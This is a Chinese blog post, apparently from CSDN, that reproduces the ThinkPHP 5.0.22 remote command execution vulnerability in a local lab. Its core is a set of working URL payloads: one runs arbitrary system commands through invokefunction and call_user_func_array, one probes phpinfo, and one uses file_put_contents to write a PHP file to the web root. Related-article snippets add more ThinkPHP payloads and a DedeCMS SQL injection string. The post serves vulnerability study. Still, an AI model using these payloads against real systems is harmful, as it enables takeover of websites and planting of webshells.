thinkphp5.*远程命令执行漏洞复现

最新推荐文章于 2024-06-23 19:07:57 发布
最新推荐文章于 2024-06-23 19:07:57 发布
阅读量615 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42075643/article/details/113253912
版权

ThinkPHP5漏洞复现:
环境搭建成功后的界面
测试版本:ThinkPHP_full_v5.0.22
远程执行命令漏洞:
首先工具检测漏洞是否存在:
检测工具
远程执行命令,wireshark抓包:
wireshark抓包界面
直接得到poc:

http://127.0.0.1/tp5/public/index.php/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令]

用BP验证:
burpsuite界面
获取PHP信息的poc:http://127.0.0.1/tp5/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
用BP验证:
BP验证结果
然后,写入phpinfo:

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E

访问http://127.0.0.1/tp5/public/info.php

显示PHP信息即成功!

《小白初练》

小菜茑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php命令执行漏洞利用,ThinkPHP 5.0 & 5.1远程命令执行漏洞利用分析
weixin_31308407的博客
03-21 833
0x01 漏洞利用方式5.0版本POC(不唯一)命令执行:?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[系统命令]文件写入:?s=index/\think\app/invokefunction&function=call_user_...
ThinkPHP 2.x 任意代码执行漏洞复现
zeroc009的博客
02-14 367
ThinkPHP 2.x 任意代码执行漏洞复现漏洞简述影响范围复现过程 漏洞简述 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at position 7: depr.'\̲
thinkphp 5.x全版本任意代码执行
yuanfengfengyuan的博客
06-05 859
MSG ThinkPHP 5.x 版本中没有对路由中的控制器进行严格过滤,在存在admin、index模块、没有开启强制路由的条件下(默认不开启),导致可以注入恶意代码利用反射类调用命名空间其他任意内置类,从而被 GetShell。 POC 反斜杠解析成类造成命令执行 thinkphp 5.0.22 1、http://192.168.1.1/thinkphp/public/?s=.|think\...
Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-23 1193
这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。
thinkphp5.0.23命令执行-靶场复现
m0_66376444的博客
04-19 1025
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。在大于5.0.21小于等于5.0.23的情况下,由于修改了method函数的逻辑,无法随意用变量,这里统一用只能用get[],route[]。命令执行成功,可以看出是windows,所以我用nc来拿shell。本次测试版本:thinkphp5.0.23。三、thinkphp总述。
命令执行漏洞
一个普普通通的博客
04-18 562
命令执行
Thinkphp 5.x远程命令执行漏洞
白泽Sec安全实验室
11-07 1639
漏洞描述 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,推荐尽快更新到最新版本。 thinkphp5最出名的就是rce,rce有两个大版本的分别: ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 因为漏洞触发点和版本的不同,导致payload分为多种,其中一些payload需要取决于debug选项比如直
thinkphp5调用shell脚本_ThinkPHP 5.x远程命令执行漏洞复现
weixin_34566429的博客
12-23 548
一、漏洞描述2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞:漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。二、漏洞影响版本Thinkphp 5.x-Thinkphp 5.1.31Thinkphp 5.0.x<=5.0.23三、漏洞复...
thinkphp5调用shell脚本_【漏洞复现ThinkPHP5 5.x 远程命令执行(getshell)
weixin_39906358的博客
01-16 319
0x00复现环境0x01步骤0x02漏洞原理分析关键代码在修复之前程序未对控制器进行过滤,导致攻 击 者可以通过引入 \ 符号来调用任意类方法。$this -> app -> controller 方法来实例化控制器,然后调用实例中的方法。follow the controller method:thinkphp/library/think/App.php通过parseModuleAn...
thinkphp5远程代码执行漏洞分析(一)
weixin_30482383的博客
08-28 625
payload 测试版本thinkphp5.1beta url =>http://127.0.0.1/thinkphp5.1beta/public/index.php?s=index/\think\Container/invokefunction&function=call_user_func&vars[0]=phpinfo&vars[1]=1 漏洞...
复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
weixin_56513549的博客
02-21 2740
执行whoami /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1...
攻防世界web练习15
H_S2022的博客
07-13 404
攻防世界web练习
ThinkPHP5RCE漏洞复现
飞雪 SecurityBlog
06-16 275
Payload:/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
php _get漏洞,thinkphp代码执行getshell的漏洞解决
weixin_35797900的博客
03-18 610
先来简单说说前天thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell影响的范围:5.x < 5.1.31, <= 5.0.23漏洞危害: 导致系统被提权(你懂的)先来讲下,5.0 跟5.1的区别吧,tp5.1中引入了容器(Container)和门面(Facade)这两个新的类 tp5.0是没有这两个新的类的,漏洞原理URL:ht...
织梦用的是php还是thinkphp,常见的程序漏洞渗透语句ThinkPHP/织梦(dede)/WordPress等......
weixin_39872123的博客
03-18 1375
都是渗透我博客防火墙里看到的...我只知道大概的渗透语句,和渗透什么程序的.具体好不好使怎么用我就不知道了...#织梦/digg/digg_add.php?id=1&con=2&digg_mod=digg_data%20WHERE%201=2%20+and(select%201%20from(select%20count(*),concat((select%20(select%20...
ThinkPHP5远程命令执行漏洞
qq_45314073的博客
09-20 2037
thinkPHP5漏洞复现
thinkphp5漏洞几道例题
wo41ge的博客
11-14 233
漏洞 具体看这里 ThinkPHP5.0.23(远程命令执行) 例题[BJDCTF 2nd]old-hack index.php?s=1查看版本 POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag ThinkPHP V5.0.20(远程
ThinkPHP5.0.* Request类远程代码执行漏洞分析
"这篇文档主要讨论的是ThinkPHP框架中的一个安全漏洞,具体是关于request函数的远程代码执行问题,涉及到的文件是library/think/Request.php的541至603行。此问题影响ThinkPHP 5.0.*版本。攻击者可以利用这个漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值